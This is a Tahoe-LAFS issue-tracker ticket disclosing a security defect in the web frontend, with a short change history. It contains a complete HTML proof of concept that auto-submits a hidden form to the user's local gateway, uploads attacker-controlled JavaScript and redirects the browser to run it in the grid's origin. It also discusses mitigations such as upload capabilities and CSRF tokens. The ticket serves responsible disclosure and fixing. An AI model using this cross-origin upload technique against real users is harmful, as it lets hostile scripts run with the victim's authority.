Opened at 2012-11-15T02:47:10Z
Last modified at 2013-09-14T17:41:18Z
#1859 new defect
Proof-of-concept attack: Upload and execute attacker controlled js from any domain. — at Version 2
| Reported by: | nejucomo | Owned by: | davidsarah |
|---|---|---|---|
| Priority: | major | Milestone: | undecided |
| Component: | code-frontend-web | Version: | 1.9.2 |
| Keywords: | security javascript same-origin capleak websec | Cc: | frederik.braun+tahoe@… |
| Launchpad Bug: |
Description (last modified by nejucomo)
Proof of Concept Attack
The following proof of concept shows how an html file loaded from any domain into (some) browsers with javascript enabled can inject an attacker controlled script into a grid, and *then* cause the user to execute that script in the domain of the grid:
<html>
<head>
<script>
var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';
window.onload = function () {
var payload_input = document.getElementById('payload_input');
payload_input.value = PAYLOAD
var the_form = document.getElementById('the_form');
the_form.submit();
}
</script>
</head>
<body id="body">
<p>
demo attack:
</p>
<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>
<form id="the_form"
method="POST"
action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
enctype="multipart/form-data"
>
<input id="payload_input" type="text" name="file"></input>
</form>
</body>
</html>
Mitigations:
There are several moving parts at work here. The when_done parameter with uri substitution was very convenient.
I think an upload capability would be the most consistent and thorough solution. Removing bits and pieces which may otherwise be useful, like when_done, feels like a piecemeal defense.
Requiring CSRF tokens may be more comprehensive, but also doesn't sit well with the rest of the capability model. (A CSRF token would be a bit like a "make a this kind of http request" temporary capability.)
Related Tickets:
- #615 is about illicitly gaining victim capabilities; whereas this ticket is about bootstrapping and attack and/or abusing ambient authority.
- #1215 is about adding CORS support and how that may create a vulnerability; this script demonstrates even without CORS support similar vulnerabilities already exist.
Change History (2)
comment:1 Changed at 2012-11-15T02:50:25Z by davidsarah
- Component changed from unknown to code-frontend-web
- Keywords security javascript same-origin capleak added
- Priority changed from normal to major
comment:2 Changed at 2012-11-15T02:55:43Z by nejucomo
- Description modified (diff)
